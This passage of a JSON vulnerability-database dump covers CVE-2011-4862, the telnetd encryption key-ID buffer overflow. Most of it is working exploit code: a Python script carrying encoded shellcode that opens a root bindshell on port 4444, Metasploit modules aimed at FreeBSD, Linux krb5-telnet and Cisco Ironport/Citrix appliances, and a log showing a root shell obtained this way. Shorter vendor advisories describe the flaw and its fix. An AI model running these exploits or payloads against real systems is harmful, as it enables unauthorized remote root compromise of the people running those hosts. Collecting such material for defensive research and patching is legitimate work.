payload...\")\r\n\t\tsock.put(sploit)\r\n\t\thandler\r\n\r\n\t\t::IO.select(nil, nil, nil, 0.5)\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18368/"}], "packetstorm": [{"lastseen": "2016-12-05T22:22:02", "description": "", "published": 
"2012-01-16T00:00:00", "type": "packetstorm", "title": "FreeBSD telnetd Remote Root ", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-16T00:00:00", "id": "PACKETSTORM:108694", "href": "https://packetstormsecurity.com/files/108694/FreeBSD-telnetd-Remote-Root.html", "sourceData": "`#!/usr/bin/env python \n# Checks/exploits CVE-2011-4862 (remote root in encryption supporting telnetd) in multiple FreeBSD versions. \n# Author: Knull of http://leethack.info \n# References: \n# Metasploit module, http://www.metasploit.com/modules/exploit/freebsd/telnet/telnet_encrypt_keyid \n# FreeBSD advisory, http://lists.freebsd.org/pipermail/freebsd-announce/2011-December/001398.html \n \nimport random, string, struct, socket, time, sys \n \ndef usage(): \n \nprint \"Usage: \" + sys.argv[0] + \" [Option] host\\n\\nOptions: \\n -c\\tcheck if telnetd is vulnerable and running as root (runs command `id` on host)\\n -e\\texploit host (opens a bindshell on port 4444)\\n\" \n \nif len(sys.argv) == 3: \nhost = sys.argv[2].rstrip() \nport = 23 \nif sys.argv[1] == '-c': \n# slightly modified version of metasploits bsd/x86/exec: \n# \n# bsd/x86/exec - 71 bytes \n# http://www.metasploit.com \n# Encoder: x86/shikata_ga_nai \n# AppendExit=false, CMD=id, PrependSetresuid=false, \n# PrependSetuid=false, VERBOSE=false, PrependSetreuid=false \nbuf = \"\\xda\\xd0\\xb8\\x7b\\x91\\x45\\xc5\\xd9\\x74\\x24\\xf4\\x5d\\x2b\\xc9\\xb1\\x0c\\x31\\x45\\x17\\x03\\x45\\x17\\x83\\x96\\x6d\\xa7\\x30\\x02\\xb5\\x70\\x22\\x80\\xa1\\xad\\x37\\x24\\x32\\x27\\x50\\x76\\x5a\\x59\\xb0\\x05\\xf2\\xcd\\xe1\\xc6\\x60\\x67\\x77\\xfb\\x37\\x9f\\x84\\xfb\\xb7\\x5f\\xe2\\x9f\\xb7\\x08\\xa7\\xd6\\x59\\xe4\\x16\\xbb\\xc9\\xc4\\x19\" \nelif sys.argv[1] == '-e': \n# slightly modified version of metasploits bsd/x86/shell_bind_tcp: \n# \n# bsd/x86/shell_bind_tcp - 100 bytes \n# http://www.metasploit.com \n# Encoder: x86/shikata_ga_nai \n# AutoRunScript=, AppendExit=false, PrependSetresuid=false, \n# 
InitialAutoRunScript=, PrependSetuid=false, LPORT=4444, \n# VERBOSE=false, RHOST=, PrependSetreuid=false \nbuf = \"\\xda\\xc8\\xbe\\x7b\\xd4\\xea\\x14\\xd9\\x74\\x24\\xf4\\x58\\x2b\\xc9\\xb1\\x13\\x31\\x70\\x18\\x83\\xc0\\x04\\x03\\x70\\x6f\\x36\\x1f\\x25\\x4f\\xe6\\x88\\xb9\\x4d\\x16\\x15\\xcf\\xb6\\x48\\xcf\\xce\\x52\\x6b\\x65\\xc1\\x12\\x0a\\xb4\\x61\\x05\\x9d\\x16\\x08\\xc1\\x45\\x5a\\x4c\\x98\\x31\\x88\\xfd\\xf0\\x70\\xd0\\x4e\\x1a\\x46\\x51\\xfe\\x72\\x32\\x08\\xa7\\xbf\\x42\\x53\\x18\\xdb\\x3a\\x5a\\xf7\\x4b\\x92\\x8d\\x8b\\xe3\\x84\\xfe\\x09\\x9a\\x3a\\x88\\x2d\\x0c\\x97\\xd9\\xe1\\x1c\\x2c\\x13\\x81\" \nelse: \nusage() \nexit() \nelse: \nusage() \nexit() \n \n \nsocket.setdefaulttimeout(10) \nrg = random.SystemRandom() \nalnum = string.letters[0:52] + string.digits \n \ndef rand_alnumlst(length): \nreturn list(''.join(rg.choice(alnum) for _ in range(length))) \n \nenc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\" \nenc_keyid = \"\\xff\\xfa\\x26\\x07\" \nend_suboption = \"\\xff\\xf0\" \n \n# ret values for multiple FreeBSD versions \nrets = 0x0804a8a9, 0x0804a889, 0x0804a869, 0x08057bd0, 0x0804c4e0, 0x0804a5b4, 0x08052925, 0x0804cf31, 0x8059730 \nversion = '8.2', '8.1', '8.0', '7.3/7.4', '7.0/7.1/7.2', '6.3/6.4', '6.0/6.1/6.2', '5.5', '5.3' \n \n# display banner \nprint \"Vulnerability checker/exploit for CVE-2011-4862 (FreeBSD telnetd encryption)\" \nprint \"by Knull, http://leethack.info\\n\" \n \ncount = 0 \ntried = 0 \n \n# loop through the ret's until one works \nfor ret in rets: \n \nkey_id = rand_alnumlst(400) \nkey_id[0:1] = \"\\xeb\\x76\" \nkey_id[72:75] = struct.pack('<I', ret - 20) \nkey_id[76:79] = struct.pack('<I', ret) \nkey_id[80:191] = rand_alnumlst(112) \nkey_id[120:121] = \"\\xeb\\x46\" \nkey_id[192:191+len(buf)] = buf \n \ns = '' \nfor i in key_id: \ns += ''.join(i) \n \nsploit = enc_keyid + s + end_suboption \n \nprint \"Trying FreeBSD \" + version[count] + \"...\\n\" \n \ntry: \n \nsock = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock.connect((host, port)) \nsock.send(enc_init) \ndata = sock.recv(32) \n \nsock.send(sploit) \ndata = sock.recv(32) \ntime.sleep(0.5) \n \nif data: \n \nsock.send(sploit) \ntime.sleep(0.5) \n \nif sys.argv[1] == '-e': \ntried = 1 \nsock.close() \n \nelif sys.argv[1] == '-c': \nresult = sock.recv(128) \nsock.close() \n \nif result.find(\"root\") != -1: \nprint host + \" is vulnerable, result of command: id\\n\" + result \nexit() \n \nsock.close() \n \nexcept socket.error: \npass \n \ncount+=1 \n \nif tried: \nprint \"Sent payloads, check bindshell on \" + host + \", port 4444\\n\" \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108694/freebsdtelnetd.py.txt"}, {"lastseen": "2016-12-05T22:17:27", "description": "", "published": "2011-12-28T00:00:00", "type": "packetstorm", "title": "FreeBSD Telnet Service Encyption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-28T00:00:00", "id": "PACKETSTORM:108198", "href": "https://packetstormsecurity.com/files/108198/FreeBSD-Telnet-Service-Encyption-Key-ID-Buffer-Overflow.html", "sourceData": "`## \n# $Id: $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Telnet \ninclude Msf::Exploit::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'FreeBSD Telnet Service Encyption Key ID Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the encryption option handler of the \nFreeBSD telnet service. \n}, \n'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['BID', '51182'], \n['CVE', '2011-4862'], \n['URL', 'http://www.exploit-db.com/exploits/18280/'] \n], \n'Privileged' => true, \n'Platform' => 'bsd', \n'Payload' => \n{ \n'Space' => 128, \n'BadChars' => \"\\x00\", \n}, \n \n'Targets' => \n[ \n[ 'Automatic', { } ], \n[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx \n[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx \n[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx \n[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx \n[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx \n[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx \n[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx \n[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx \n# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called) \n[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return \n# Versions 5.2 and below do not support encyption \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '')) \nend \n \ndef exploit_target(t) \n \nconnect \nbanner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) \nprint_status(banner_sanitized) if datastore['VERBOSE'] \n \nenc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\" \nenc_keyid = \"\\xff\\xfa\\x26\\x07\" 
\nend_suboption = \"\\xff\\xf0\" \n \n# Telnet protocol requires 0xff to be escaped with another \npenc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\") \n \nkey_id = Rex::Text.rand_text_alphanumeric(400) \nkey_id[ 0, 2] = \"\\xeb\\x76\" \nkey_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\") \nkey_id[76, 4] = [ t['Ret'] ].pack(\"V\") \n \n# Some of these bytes can get mangled, jump over them \nkey_id[80,112] = Rex::Text.rand_text_alphanumeric(112) \n \n# Bounce to the real payload (avoid corruption) \nkey_id[120, 2] = \"\\xeb\\x46\" \n \n# The actual payload \nkey_id[192, penc.length] = penc \n \n# Create the Key ID command \nsploit = enc_keyid + key_id + end_suboption \n \n# Initiate encryption \nsock.put(enc_init) \n \n# Wait for a successful response \nloop do \ndata = sock.get_once(-1, 5) rescue nil \nif not data \nraise RuntimeError, \"This system does not support encryption\" \nend \nbreak if data.index(\"\\xff\\xfa\\x26\\x02\\x01\") \nend \n \n# The first request smashes the pointer \nprint_status(\"Sending first payload\") \nsock.put(sploit) \n \n# Make sure the server replied to the first request \ndata = sock.get_once(-1, 5) \nunless data \nprint_status(\"Server did not respond to first payload\") \nreturn \nend \n \n# Some delay between each request seems necessary in some cases \n::IO.select(nil, nil, nil, 0.5) \n \n# The second request results in the pointer being called \nprint_status(\"Sending second payload...\") \nsock.put(sploit) \n \nhandler \n \n::IO.select(nil, nil, nil, 0.5) \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108198/freebsd-telnet-telnet_encrypt_keyid.rb.txt"}, {"lastseen": "2016-12-05T22:23:14", "description": "", "published": "2011-12-28T00:00:00", "type": "packetstorm", "title": "Linux BSD-derived Telnet Service Encyption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": 
["CVE-2011-4862"], "modified": "2011-12-28T00:00:00", "id": "PACKETSTORM:108199", "href": "https://packetstormsecurity.com/files/108199/Linux-BSD-derived-Telnet-Service-Encyption-Key-ID-Buffer-Overflow.html", "sourceData": "`## \n# $Id: $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Telnet \ninclude Msf::Exploit::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linux BSD-derived Telnet Service Encyption Key ID Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the encryption option handler of the \nLinux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions \nuse NetKit-derived telnet daemons, so this flaw only applies to a small subset of \nLinux systems running telnetd. 
\n}, \n'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['BID', '51182'], \n['CVE', '2011-4862'], \n['URL', 'http://www.exploit-db.com/exploits/18280/'] \n], \n'Privileged' => true, \n'Platform' => 'linux', \n'Payload' => \n{ \n'Space' => 200, \n'BadChars' => \"\\x00\", \n'DisableNops' => true, \n}, \n \n'Targets' => \n[ \n[ 'Automatic', { } ], \n[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ], \n \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '')) \nend \n \ndef exploit_target(t) \n \nconnect \nbanner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) \nprint_status(banner_sanitized) if datastore['VERBOSE'] \n \nenc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\" \nenc_keyid = \"\\xff\\xfa\\x26\\x07\" \nend_suboption = \"\\xff\\xf0\" \n \npenc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\") \n \nkey_id = Rex::Text.rand_text_alphanumeric(400) \n \nkey_id[ 0, 2] = \"\\xeb\\x76\" \nkey_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\") \nkey_id[76, 4] = [ t['Ret'] ].pack(\"V\") \n \n# Some of these bytes can get mangled, jump over them \nkey_id[80,40] = \"\\x41\" * 40 \n \n# Insert the real payload \nkey_id[120, penc.length] = penc \n \n# Create the Key ID command \nsploit = enc_keyid + key_id + end_suboption \n \n# Initiate encryption \nsock.put(enc_init) \n \n# Wait for a successful response \nloop do \ndata = sock.get_once(-1, 5) rescue nil \nif not data \nraise RuntimeError, \"This system does not support encryption\" \nend \nbreak if data.index(\"\\xff\\xfa\\x26\\x02\\x01\") \nend \n \n# The first request smashes the pointer \nprint_status(\"Sending first payload\") \nsock.put(sploit) \n \n# Make sure the server replied to the first request \ndata = sock.get_once(-1, 5) \nunless data \nprint_status(\"Server did not respond to first payload\") \nreturn \nend \n \n# Some delay between each 
request seems necessary in some cases \n::IO.select(nil, nil, nil, 0.5) \n \n# The second request results in the pointer being called \nprint_status(\"Sending second payload...\") \nsock.put(sploit) \nhandler \n \n::IO.select(nil, nil, nil, 0.5) \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108199/linux-telnet-telnet_encrypt_keyid.rb.txt"}, {"lastseen": "2016-12-05T22:14:48", "description": "", "published": "2012-01-11T00:00:00", "type": "packetstorm", "title": "FreeBSD based telnetd encrypt_key_id brute force", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-11T00:00:00", "id": "PACKETSTORM:108539", "href": "https://packetstormsecurity.com/files/108539/FreeBSD-based-telnetd-encrypt_key_id-brute-force.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Brute \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'FreeBSD based telnetd encrypt_key_id brute force', \n'Description' => %q{ \nThis module exploits a buffer overflow in the encryption option handler of the \nFreeBSD telnet service. 
\n}, \n'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ], \n'References' => \n[ \n['BID', '51182'], \n['OSVDB', '78020'], \n['CVE', '2011-4862'], \n['URL', 'http://www.exploit-db.com/exploits/18280/'] \n], \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 128, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => [ 'bsd' ], \n'Targets' => \n[ \n# \n# specific targets \n# \n[ 'Cisco Ironport 7.x Bruteforce', \n{ \n'Bruteforce' => \n{ \n \n'Start' => { 'Ret' => 0x0805cffd }, \n'Stop' => { 'Ret' => 0x0805aa00 }, \n'Step' => 8 \n} \n} \n], \n \n[ 'Citrix Netscaler 9.x', \n{ \n'Bruteforce' => \n{ \n \n'Start' => { 'Ret' => 0x0805bffd }, \n'Stop' => { 'Ret' => 0x08059000 }, \n'Step' => 8 \n} \n} \n], \n \n[ 'Other FreeBSD based targets', \n{ \n'Bruteforce' => \n{ \n \n'Start' => { 'Ret' => 0x0805fffd }, \n'Stop' => { 'Ret' => 0x08050000 }, \n'Step' => 8 \n} \n} \n], \n \n \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Dec 23 2011')) \n \nregister_options( \n[ \nOpt::RPORT(23), \n], self.class ) \nend \n \ndef brute_exploit(addrs) \ncurr_ret = addrs['Ret'] \nbegin \nconnect \n \nsock.get_once \nprint_status('Initiate encryption mode ...') \n \nreq = '' \nreq << \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\" \nreq << \"\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\" \nreq << \"\\x00\" \n \nsock.put(req) \nsock.get_once \nreq = '' \nprint_status(\"Trying return address 0x%.8x...\" % curr_ret ) \nprint_status('Sending first payload ...') \n \nreq << \"\\xff\\xfa\\x26\\x07\" \nreq << \"\\x00\" \nreq << make_nops(71) \npenc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\") \nreq << [curr_ret].pack('V') \nreq << [curr_ret].pack('V') \n \nreq << make_nops(128) \nreq << penc \nreq << \"\\x90\\x90\\x90\\x90\" \nreq << \"\\xff\\xf0\" \nreq << \"\\x00\" \n \nsock.put(req) \nsock.get_once \nprint_status('Sending second payload ...') \nsock.put(req) \n \ndisconnect \nhandler \nrescue \nend \nend \n \nend`\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108539/telnet_encrypt_keyid_bruteforce.rb.txt"}], "saint": [{"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "description": "Added: 02/11/2012 \nCVE: [CVE-2011-4862](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862>) \nBID: [51182](<http://www.securityfocus.com/bid/51182>) \nOSVDB: [78020](<http://www.osvdb.org/78020>) \n\n\n### Background\n\nTelnet is a network protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communications facility using a virtual terminal connection. \n\n### Problem\n\nThe flaw is caused due to a boundary error within the \"encrypt_keyid()\" function (libtelnet/encrypt.c). This can be exploited to cause a buffer overflow via a long encryption key. \n\n### Resolution\n\nApply the vendor supplied patch for the target system or update FreeBSD/krb5. \n\n### References\n\n<http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt> \n<http://thexploit.com/secdev/a-textbook-buffer-overflow-a-look-at-the-freebsd-telnetd-code/> \n\n\n### Limitations\n\nThis exploit has been tested against telnetd on FreeBSD 8.0, FreeBSD 8.2, NetBSD 5.1 and Debian 6.0.2 Heimdal Server 1.5. 
\n\n### Platforms\n\nFreeBSD 8.0 \nFreeBSD 8.1 \nFreeBSD 8.2 \nNetBSD 5.1 \nLinux / Debian \n \n\n", "edition": 1, "modified": "2012-02-11T00:00:00", "published": "2012-02-11T00:00:00", "id": "SAINT:4B6F19E604FCF1B28C3D4F6A458FF688", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/telnet_server_encrypt_keyid", "type": "saint", "title": "Telnetd Encryption Key ID Code Execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "description": "Added: 02/11/2012 \nCVE: [CVE-2011-4862](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862>) \nBID: [51182](<http://www.securityfocus.com/bid/51182>) \nOSVDB: [78020](<http://www.osvdb.org/78020>) \n\n\n### Background\n\nTelnet is a network protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communications facility using a virtual terminal connection. \n\n### Problem\n\nThe flaw is caused due to a boundary error within the \"encrypt_keyid()\" function (libtelnet/encrypt.c). This can be exploited to cause a buffer overflow via a long encryption key. \n\n### Resolution\n\nApply the vendor supplied patch for the target system or update FreeBSD/krb5. \n\n### References\n\n<http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt> \n<http://thexploit.com/secdev/a-textbook-buffer-overflow-a-look-at-the-freebsd-telnetd-code/> \n\n\n### Limitations\n\nThis exploit has been tested against telnetd on FreeBSD 8.0, FreeBSD 8.2, NetBSD 5.1 and Debian 6.0.2 Heimdal Server 1.5. 
\n\n### Platforms\n\nFreeBSD 8.0 \nFreeBSD 8.1 \nFreeBSD 8.2 \nNetBSD 5.1 \nLinux / Debian \n \n\n", "edition": 4, "modified": "2012-02-11T00:00:00", "published": "2012-02-11T00:00:00", "id": "SAINT:2E667FA9EE1CC48C054B8BF1D1337065", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/telnet_server_encrypt_keyid", "title": "Telnetd Encryption Key ID Code Execution", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "edition": 2, "description": "Added: 02/11/2012 \nCVE: [CVE-2011-4862](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862>) \nBID: [51182](<http://www.securityfocus.com/bid/51182>) \nOSVDB: [78020](<http://www.osvdb.org/78020>) \n\n\n### Background\n\nTelnet is a network protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communications facility using a virtual terminal connection. \n\n### Problem\n\nThe flaw is caused due to a boundary error within the \"encrypt_keyid()\" function (libtelnet/encrypt.c). This can be exploited to cause a buffer overflow via a long encryption key. \n\n### Resolution\n\nApply the vendor supplied patch for the target system or update FreeBSD/krb5. \n\n### References\n\n<http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt> \n<http://thexploit.com/secdev/a-textbook-buffer-overflow-a-look-at-the-freebsd-telnetd-code/> \n\n\n### Limitations\n\nThis exploit has been tested against telnetd on FreeBSD 8.0, FreeBSD 8.2, NetBSD 5.1 and Debian 6.0.2 Heimdal Server 1.5. 
\n\n### Platforms\n\nFreeBSD 8.0 \nFreeBSD 8.1 \nFreeBSD 8.2 \nNetBSD 5.1 \nLinux / Debian \n \n\n", "modified": "2012-02-11T00:00:00", "published": "2012-02-11T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/telnet_server_encrypt_keyid", "id": "SAINT:9BB5708972A26A51904B1BC21D31E721", "type": "saint", "title": "Telnetd Encryption Key ID Code Execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-14T23:50:13", "description": "The Cisco Ironport WSA virtual appliances are vulnerable to an old FreeBSD telnetd encryption Key ID buffer overflow which allows remote attackers to execute arbitrary code. Cisco WSA Virtual appliances have the vulnerable telnetd daemon enabled by default.", "edition": 2, "published": "2014-10-24T00:00:00", "type": "zdt", "title": "Cisco Ironport WSA telnetd Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2014-10-24T00:00:00", "id": "1337DAY-ID-22784", "href": "https://0day.today/exploit/description/22784", "sourceData": "Cisco Ironport WSA Telnetd Remote Code Execution Vulnerability\r\nVendor: Cisco\r\nProduct web page: http://www.cisco.com\r\nAffected version: Cisco Ironport WSA - AsyncOS 8.0.5 for Web build 075\r\nDate: 22/05/2014\r\nCredits: Glafkos Charalambous\r\nCVE: CVE-2011-4862\r\nCVSS Score: 7.6\r\nImpact: Unauthenticated Remote Code Execution with elevated privileges\r\nDescription: The Cisco Ironport WSA virtual appliances are vulnerable to an old FreeBSD telnetd encryption Key ID buffer overflow which allows remote attackers to execute arbitrary code (CVE-2011-4862).\r\nCisco WSA Virtual appliances have the vulnerable telnetd daemon enabled by default. \r\n\r\ndiff --git a/ChangeLog b/ChangeLog\r\nindex dd381d1..f4e4457 100644\r\n--- a/ChangeLog\r\n+++ b/ChangeLog\r\n@@ -1,3 +1,8 @@\r\n+2011-12-25 Alfred M. 
Szmidt <[email\u00a0protected]>\r\n+\r\n+ * libtelnet/encrypt.c (encrypt_keyid): Make sure that LEN never is\r\n+ greater than MAXKEYLEN.\r\n+\r\n 2011-12-22 Mats Erik Andersson <[email\u00a0protected]>\r\n \r\n * libinetutils/setsig.c (setsig) [HAVE_SIGACTION]: Initialize\r\ndiff --git a/libtelnet/encrypt.c b/libtelnet/encrypt.c\r\nindex 06827d9..abfa6d4 100644\r\n--- a/libtelnet/encrypt.c\r\n+++ b/libtelnet/encrypt.c\r\n@@ -796,6 +796,9 @@ encrypt_keyid (kp, keyid, len)\r\n int dir = kp->dir;\r\n register int ret = 0;\r\n \r\n+ if (len > MAXKEYLEN)\r\n+ len = MAXKEYLEN;\r\n+\r\n if (!(ep = (*kp->getcrypt) (*kp->modep)))\r\n {\r\n if (len == 0)\r\n\r\n\r\nTrying 192.168.0.160...\r\nConnected to 192.168.0.160.\r\nEscape character is '^]'.\r\n\r\n[+] Exploiting 192.168.0.160, telnetd rulez!\r\n[+] Target OS - FreeBSD 8.2 amd64\r\n[*] Enjoy your shell\r\nuid=0(root) gid=0(wheel) groups=0(wheel),5(operator)\r\nuname -a\r\nFreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 10:49:50 PDT 2014 [email\u00a0protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64\r\n\r\nDisclosure Timeline\r\n19-05-2014: Vendor Notification\r\n20-05-2014: Vendor Response/Feedback\r\n27-08-2014: Vendor Fix/Patch\r\n22-10-2014: Public Disclosure\r\n\r\nReferences:\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862\r\nhttp://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc\r\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22784"}], "cisco": [{"lastseen": "2020-12-24T11:41:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-4862"], "description": "A vulnerability in telnet code of Cisco AsyncOS could allow an\nunauthenticated, remote attacker to to execute arbitrary code on 
the\naffected system.\n\nThe vulnerability is due to insufficient boundary\nchecks when processing telnet encryption keys. An unauthenticated,\nremote attacker could exploit this vulnerability by sending malicious\nrequests to a targeted system. If successful, the attacker could\nexecute arbitrary code on the system with elevated privileges.\n\nCisco AsyncOS Software for Cisco Web Security Appliance (WSA), Cisco Email Security Appliance (ESA), and Cisco Content Security Management Appliance (SMA) contain a vulnerability that may allow a remote, unauthenticated attacker to execute arbitrary code with elevated privileges. \n\nCisco has released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are available. \n\nNote: This security advisory has been updated to include important information about Cisco WSA\n\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\"]", "modified": "2014-12-08T21:21:32", "published": "2012-01-26T17:00:00", "id": "CISCO-SA-20120126-IRONPORT", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport", "type": "cisco", "title": "Cisco IronPort Appliances Telnet Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:28:59", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "**CentOS Errata and Security Advisory** CESA-2011:1852\n\n\nThe krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh, and\nrlogin clients and servers. 
Kerberos is a network authentication system\nwhich allows clients and servers to authenticate to each other using\nsymmetric encryption and a trusted third-party, the Key Distribution Center\n(KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd). A \nremote attacker who can access the telnet port of a target machine could use\nthis flaw to execute arbitrary code as root. (CVE-2011-4862) \n\nNote that the krb5 telnet daemon is not enabled by default in any version of\nRed Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-appl-servers package, have enabled the \nkrb5 telnet daemon, and have it accessible remotely, this update should be\napplied immediately. \n\nAll krb5-appl-server users should upgrade to these updated packages, which \ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from 